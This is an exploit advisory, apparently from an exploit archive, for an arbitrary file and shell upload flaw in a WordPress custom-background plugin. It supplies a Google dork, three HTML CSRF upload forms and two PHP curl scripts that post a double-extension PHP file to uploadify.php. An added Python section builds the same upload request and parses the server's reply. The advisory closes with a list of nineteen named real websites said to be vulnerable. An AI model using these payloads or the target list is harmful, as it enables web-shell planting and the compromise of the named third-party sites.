####################################################################
# Exploit Title : WordPress Custom-BackGround Plugins 3.0 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/03/2020
# Vendor Homepage :
# Software Link : plugins.righthere.com/custom-backgrounds/
# Software Affected Version (fields copied from the plugin readme; "Requires at least" and "Tested up to" are WordPress versions, the stable tag is the plugin version) :
Requires at least: 3.0
Tested up to: 3.3.1
Stable tag: 3.1.5 rev22255
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : inurl:/wp-content/plugins/custom-background/
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
WordPress Custom-BackGround Plugins 3.0 ships an upload handler
(/wp-content/plugins/custom-background/uploadify/uploadify.php) that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the web server process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.
CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
client into making an unintentional request to the web server which will be treated as an
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
can result in exposure of data or unintended code execution.
CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and
other security features that are used to perform access control.
CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can
be automatically processed within the product's environment.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/custom-background/uploadify/uploadify.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
# CSRF Cross Site Request Forgery Exploit 2 =>
****************************************
<html>
<head><title>WordPress Custom-BackGround Plugins Exploiter</title></head>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/custom-background/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.php.pjpg" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
</body>
</html>
# CSRF Cross Site Request Forgery Exploit 3=>
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/custom-background/uploadify/uploadify.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
PHP Exploiter Code 1 :
*********************
<?php
// Posts the local file to the exposed uploadify.php endpoint as form field "file".
$uploadfile = "kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the legacy "@file" upload syntax, which PHP 7+ no longer honours.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('file' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult; // the script's JSON reply, e.g. {"R":"ERR","MSG":"No access"} on rejection
?>
PHP Exploiter Code 2 :
*********************
<?php
// Same request, but using Uploadify's default file field name "Filedata"
// and the "folder" parameter that selects the destination directory.
$uploadfile = "kingskrupellos.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the legacy "@file" upload syntax, which PHP 7+ no longer honours.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => new CURLFile($uploadfile),
          'folder' => '/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
# Vulnerability Error :
********************
Requesting the two upload scripts below directly returns the following JSON reply,
which fingerprints an exposed copy of the plugin. Note that "No access" is the
script's own rejection message: an upload request that receives this reply was
refused, so check the reply after every attempt rather than assuming success.
{"R":"ERR","MSG":"No access"}
/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
/wp-content/plugins/custom-background/uploadify/uploadify.php
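The following Python is an added example, not code from the advisory or from the plugin. It serves two passages: the PHP exploiters above (it builds the same multipart/form-data POST with the standard library only, so it runs offline and nothing is sent) and the CWE-434 description (it shows why names like kingskrupellos.php.pjpg are tried and what a hardened upload handler must reject). It also parses the {"R":"ERR","MSG":"No access"} reply so a caller can tell a refused upload from an accepted one. The executable-extension list and the image allow-list are assumptions for illustration; a real deployment must match its own handler configuration.

```python
"""Added example: build the uploadify.php upload request, classify its
JSON reply, and check file names the way a hardened handler should.
Pure standard library; no request is sent."""
import json
import uuid

# Assumed list of suffixes a typical Apache + mod_php setup executes.
EXECUTABLE_EXTENSIONS = frozenset({"php", "php3", "php4", "php5", "php7", "phtml", "phar"})
# Assumed allow-list for a background-image upload handler.
IMAGE_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif"})


def build_multipart(fields, file_field, filename, content, boundary=None):
    """Encode the multipart/form-data body the PHP exploiters send.
    Returns (Content-Type header value, body bytes)."""
    boundary = boundary or uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
        )
    parts.append(
        (f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
         f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n').encode()
        + content + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def apache_would_execute(filename):
    """Apache mod_mime assigns handlers from every dotted suffix, so with an
    AddHandler-style PHP mapping shell.php.pjpg runs as PHP when no handler
    claims .pjpg. This mirrors that rule for the assumed extension list.
    (Configs that anchor PHP with <FilesMatch "\\.php$"> are not affected.)"""
    segments = filename.lower().split(".")[1:]
    return any(seg in EXECUTABLE_EXTENSIONS for seg in segments)


def safe_upload_name(filename, allowed=IMAGE_EXTENSIONS):
    """What a hardened handler must enforce: a non-empty base name, exactly
    one extension, that extension on the allow-list, and no executable
    suffix anywhere in the name. Rejects the double-extension trick."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1] in allowed and not apache_would_execute(filename)


def classify_response(body):
    """Interpret uploadify.php's JSON reply. {"R":"ERR","MSG":"No access"}
    (quoted in the advisory) means the script refused the upload."""
    try:
        data = json.loads(body)
    except ValueError:
        return "unknown"
    if not isinstance(data, dict):
        return "unknown"
    if data.get("R") == "ERR":
        return "rejected: " + str(data.get("MSG", ""))
    return "accepted"


if __name__ == "__main__":
    # Constructed sample: the request PHP Exploiter Code 2 would send.
    ctype, body = build_multipart(
        {"folder": "/wp-content/plugins/custom-background/uploadify/"},
        "Filedata", "kingskrupellos.php.jpg", b"<?php echo 1; ?>", boundary="abc")
    print(ctype)
    print(body.decode())
    print(apache_would_execute("kingskrupellos.php.pjpg"), safe_upload_name("kingskrupellos.php.pjpg"))
    print(classify_response('{"R":"ERR","MSG":"No access"}'))
```

Only the request body is constructed here; to actually send it one would POST `body` with the returned Content-Type header and pass the reply text to `classify_response`, treating anything other than "accepted" as a failed attempt.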
####################################################################
# Example Vulnerable Sites :
************************
[+] btee.org/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] pureflixstudio.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] piersfaccini.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] greentouch.tn/shop/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] chalet-des-sens.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] conamiescie.info/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] normandiecontacts.fr/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] capsostv.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] whiteandbluereview.com/dev/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] visitequebec.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] insidefitnessmag.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] espressomelbourne.com/2014/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] zozijncoaching.nl/site/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] africanamericangolfersdigest.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] waterwellsforafrica.org/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] radio104.fm.br/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] karikatur-graz.at/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
[+] purplepictures.net/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] osiguranje.me/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################